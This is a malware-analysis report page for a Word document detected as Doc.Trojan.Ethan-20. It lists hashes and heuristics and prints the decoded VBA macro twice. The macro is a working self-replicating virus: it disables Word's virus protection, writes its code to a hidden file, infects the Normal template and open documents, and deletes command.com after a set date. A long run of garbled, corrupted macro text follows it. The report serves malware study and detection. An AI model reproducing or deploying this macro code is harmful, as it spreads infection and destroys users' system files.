Office (OLE) malware analysis — malicious · 0cee0d85d632c9c0

MALICIOUS

Office (OLE)

33.0 KB Created: 2000-03-22 11:59:00 Authoring application: Microsoft Word 8.0 First seen: 2012-06-14

MD5: 144c00e7e5fe2f6fd1bfc00896a8a200 SHA-1: cfee86470febdbd5d05cf26505a68011fb718878 SHA-256: 0cee0d85d632c9c014ae173ec0a11ad1350a30ed1cf3f8fd56eb415a6b8fe985

80 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic

The critical ClamAV heuristic and the presence of VBA macros strongly indicate malicious intent. The VBA script attempts to copy its own code to 'c:\system.1' and set its attributes, a common technique for establishing persistence or preparing for second-stage execution. The script also manipulates application options to disable virus protection, further supporting its malicious nature.

Heuristics 2

ClamAV: Doc.Trojan.Ethan-20 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Trojan.Ethan-20
VBA macros detected medium OLE_VBA_MACROS

Document contains VBA macro code

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11288 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	11288 bytes
SHA-256: `b5a7b4d1da08c3ed414c9b127bfd78edbdc4af418a3b3b25e7b885bff0a8ad6e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Private Sub Document_Close() On Error Resume Next s = ActiveDocument.Saved Application.EnableCancelKey = Not -1 With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With If Dir("c:\system.1", 6) = "" Then Open "c:\system.1" For Output As #1 For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1) Print #1, a Next i Close #1 SetAttr "c:\system.1", 6 End If If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then Set t = NormalTemplate.VBProject.VBComponents.Item(1) ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then Set t = ActiveDocument.VBProject.VBComponents.Item(1) Else t = "" End If If t <> "" Then Open "c:\system.1" For Input As #1 If LOF(1) = 0 Then GoTo q i = 1 Do While Not EOF(1) Line Input #1, a t.CodeModule.InsertLines i, a i = i + 1 Loop q: Close #1 If Date > "25.12.99" Then Kill "c:\command.com" If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName End If If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s End Sub Attribute VB_Name = "MacroList" ' Macro to list the macro content of all the macros in the current ' template to a specified file ' Updated by SMT 19/09/1997 to cope with LARGE macros ' Updated by SMT 11/03/1999 to cope with ThisDocument Stream Dim glMacrName$ Public Sub MAIN() Dim virusfile$ Dim ie pae yST1/919 ocp ihLREmco 'Udtdb M 10/99t oewt hsouetSra DmgMcNm$ ulcSbMI( Dmvrsie Dmi peyT/1 c hRmo'dd 09tow sutröDgcm ucbI mri m eT1chm'd 9o urDc cImime1h' ouD Iieh u ihuiuuAttribute VB_Name = "MacroList" ' Macro to list the macro cfe ie pae yST1/919 ocp ihLREmco 'Udtdb M 10/99t oewt hsöuetSra DmgMcNm$ ulcSbMI( Dmvrsie Dmi peyT/1 c hRmo'dd 09tow sutr Dgcm ucbI mri m eT1chm'd 9o urDc cImime1h' ouD Iieh u ihuiuuAtiueV_ae="arLs" ar ols h ar f e a S199opiLEc UtbM1/9 ethöeSa mMN$ lSM(DvseDipy/ Rod 0twst gmub rö Tcmd9 rccmm1'oDIe hiutuVa=aL" a l rfeaS9oiE tM/ töS M$lMDsDp/ o ts mbr cd cm1oI huuaa"al fa9i M ö $Msp smrc moöua"lf9 Mp mcmöal9 M cöl ö ööAttribute VB_Name = "MacroList" ' Macro to list the macro content of all the maccp ihLREmco 'Udtdb M 10/99t oewt hsouetSra DmgMcNö$ ulcSbMI( Dmvrsie Dmi peyT/1 c hRmo'dd 09tow suör Dgcm ucbI mri m eT1chm'd 9o urDc cImime1h' ouD Iieh u ihuiuuAtiueV_ae="arLs" ar ols h ar f e a Sö99opiLEc UtbM1/9 ethöeSa mMN$ lSM(DvseDipy/ Rod 0öwst gmub r Tcmd9 rccmm1'oDIe hiutuVa=aL" a l rfeaS9oiE tM/ töS M$lMDsDp/ o ts mbr cd cm1oI huuaa"öl fa9i M ö $Msp smrc mo ua"lf9 Mp mcmöal9 M cölö ö ööAtiueV_ae="arLs" ar ols h ar otn faltemcpiLEc UtbM1/9 ethoeSa mMN$ lSM(DvseDipy/ Rod 0twsö göub r Tcmd9 rccmm1'oDIe hiutuVa=aL" a l rfeaS9oiö tM/ töS M$lMDsDp/ o ös mbr cd cm1oI huuaa"al fa9i M ö $Msp smrc mo ua"lf9 Mp mcm al9 M cöl öööööie_e"rs rosha t atmpLcUb19eheamN S(veiy Rd0wögu öm9rcm'De itV=L reSoöt/tSMlDD/oö b dc1Ihuaa aiMö$s sr ou"f pmma9Mcl ööi_"s oh tpcb9haNSvi dwg ö9cöeiVL rSö/SlDo cIuaaM$ ro" pm9c ö_so tc9aSidgöceV ö/lo IaM o mcös caigcVöl a cscicö ccc ccccAttribute VB_Name = "MacroList" ' Macro to list the maöro content of all the maccp ihLREmöo 'Udtdb M 10/99t oewt hsouetSra DmöMcNm$ ulcSbMI( Dmörsie Dmi peyT/1 c hRmo'dd 09tow sutö Dgcm ucbI mri m eö1chm'd 9o urDc cImime1h' ouD Iieh u öhuiuuAtiueV_ae="arös" ar ols h ar f e a S199opiLEc UtöM1/9 ethöeSa mMN$ öSM(DvseDipy/ Rod 0twst gmub r Tcmdö rccmm1'oDIe hiutöVa=aL" a l rfeaS9oiE tM/ töS M$lMDsöp/ o ts mbr cd cm1öI huuaa"al fa9i M ö $Msp smrc mo uaölf9 Mp mcmöal9 Möcöl ö ööAtiueV_ae="arLs" ar ols höar otn faltemcpiLEö UtbM1/9 ethoeSa mMN$ lSM(DvseDipy/ öRod ... (truncated)

SHA-256: b5a7b4d1da08c3ed414c9b127bfd78edbdc4af418a3b3b25e7b885bff0a8ad6e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Close()
On Error Resume Next
s = ActiveDocument.Saved
Application.EnableCancelKey = Not -1
With Options: .ConfirmConversions = 0: .VirusProtection = 0: .SaveNormalPrompt = 0: End With
If Dir("c:\system.1", 6) = "" Then
Open "c:\system.1" For Output As #1
For i = 1 To MacroContainer.VBProject.VBComponents.Item(1).CodeModule.CountOfLines
a = MacroContainer.VBProject.VBComponents.Item(1).CodeModule.Lines(i, 1)
Print #1, a
Next i
Close #1
SetAttr "c:\system.1", 6
End If
If NormalTemplate.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
Set t = NormalTemplate.VBProject.VBComponents.Item(1)
ElseIf ActiveDocument.VBProject.VBComponents.Item(1).CodeModule.Lines(1, 1) <> "Private Sub Document_Close()" Then
Set t = ActiveDocument.VBProject.VBComponents.Item(1)
Else
t = ""
End If
If t <> "" Then
Open "c:\system.1" For Input As #1
If LOF(1) = 0 Then GoTo q
i = 1
Do While Not EOF(1)
Line Input #1, a
t.CodeModule.InsertLines i, a
i = i + 1
Loop
q:
Close #1
If Date > "25.12.99" Then Kill "c:\command.com"
If Left(ActiveDocument.Name, 8) <> "Document" Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
End If
If ActiveDocument.Saved <> s Then ActiveDocument.Saved = s
End Sub


Attribute VB_Name = "MacroList"

' Macro to list the macro content of all the macros in the current
' template to a specified file
' Updated by SMT 19/09/1997 to cope with LARGE macros
' Updated by SMT 11/03/1999 to cope with ThisDocument Stream

Dim glMacrName$

Public Sub MAIN()
Dim virusfile$
Dim ie
 pae yST1/919 ocp ihLREmco
'Udtdb M 10/99t oewt hsouetSra

DmgMcNm$

ulcSbMI(
Dmvrsie
Dmi
peyT/1 c hRmo'dd  09tow sutröDgcm
ucbI
mri
m
eT1chm'd 9o urDc
cImime1h' ouD
Iieh u
ihuiuuAttribute VB_Name = "MacroList"

' Macro to list the macro cfe ie
 pae yST1/919 ocp ihLREmco
'Udtdb M 10/99t oewt hsöuetSra

DmgMcNm$

ulcSbMI(
Dmvrsie
Dmi
peyT/1 c hRmo'dd  09tow sutr
Dgcm
ucbI
mri
m
eT1chm'd 9o urDc
cImime1h' ouD
Iieh u
ihuiuuAtiueV_ae="arLs"

 ar ols h ar f e a S199opiLEc
UtbM1/9 ethöeSa
mMN$
lSM(DvseDipy/  Rod 0twst
gmub
rö
Tcmd9 rccmm1'oDIe 
hiutuVa=aL"
a l  rfeaS9oiE
tM/ töS
M$lMDsDp/ o ts
mbr
cd cm1oI huuaa"al fa9i
M ö
$Msp  smrc moöua"lf9
 
Mp mcmöal9 M cöl  ö ööAttribute VB_Name = "MacroList"

' Macro to list the macro content of all the maccp ihLREmco
'Udtdb M 10/99t oewt hsouetSra

DmgMcNö$

ulcSbMI(
Dmvrsie
Dmi
peyT/1 c hRmo'dd  09tow suör
Dgcm
ucbI
mri
m
eT1chm'd 9o urDc
cImime1h' ouD
Iieh u
ihuiuuAtiueV_ae="arLs"

 ar ols h ar f e a Sö99opiLEc
UtbM1/9 ethöeSa
mMN$
lSM(DvseDipy/  Rod 0öwst
gmub
r
Tcmd9 rccmm1'oDIe 
hiutuVa=aL"
a l  rfeaS9oiE
tM/ töS
M$lMDsDp/ o ts
mbr
cd cm1oI huuaa"öl fa9i
M ö
$Msp  smrc mo ua"lf9
 
Mp mcmöal9 M cölö ö ööAtiueV_ae="arLs"

 ar ols h ar otn faltemcpiLEc
UtbM1/9 ethoeSa
mMN$
lSM(DvseDipy/  Rod 0twsö
göub
r
Tcmd9 rccmm1'oDIe 
hiutuVa=aL"
a l  rfeaS9oiö
tM/ töS
M$lMDsDp/ o ös
mbr
cd cm1oI huuaa"al fa9i
M ö
$Msp  smrc mo ua"lf9
 
Mp mcm al9 M cöl  öööööie_e"rs
 rosha t atmpLcUb19eheamN
S(veiy Rd0wögu

öm9rcm'De
itV=L
  reSoöt/tSMlDD/oö
b
dc1Ihuaa aiMö$s sr ou"f

pmma9Mcl ööi_"s oh  tpcb9haNSvi dwg
ö9cöeiVL rSö/SlDo
cIuaaM$ ro"
pm9c ö_so tc9aSidgöceV ö/lo
IaM o
mcös caigcVöl
a 
cscicö
 ccc
ccccAttribute VB_Name = "MacroList"

' Macro to list the maöro content of all the maccp ihLREmöo
'Udtdb M 10/99t oewt hsouetSra

DmöMcNm$

ulcSbMI(
Dmörsie
Dmi
peyT/1 c hRmo'dd  09tow sutö
Dgcm
ucbI
mri
m
eö1chm'd 9o urDc
cImime1h' ouD
Iieh u
öhuiuuAtiueV_ae="arös"

 ar ols h ar f e a S199opiLEc
UtöM1/9 ethöeSa
mMN$
öSM(DvseDipy/  Rod 0twst
gmub
r
Tcmdö rccmm1'oDIe 
hiutöVa=aL"
a l  rfeaS9oiE
tM/ töS
M$lMDsöp/ o ts
mbr
cd cm1öI huuaa"al fa9i
M ö
$Msp  smrc mo uaölf9
 
Mp mcmöal9 Möcöl  ö ööAtiueV_ae="arLs"

 ar ols höar otn faltemcpiLEö
UtbM1/9 ethoeSa
mMN$
lSM(DvseDipy/ öRod 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.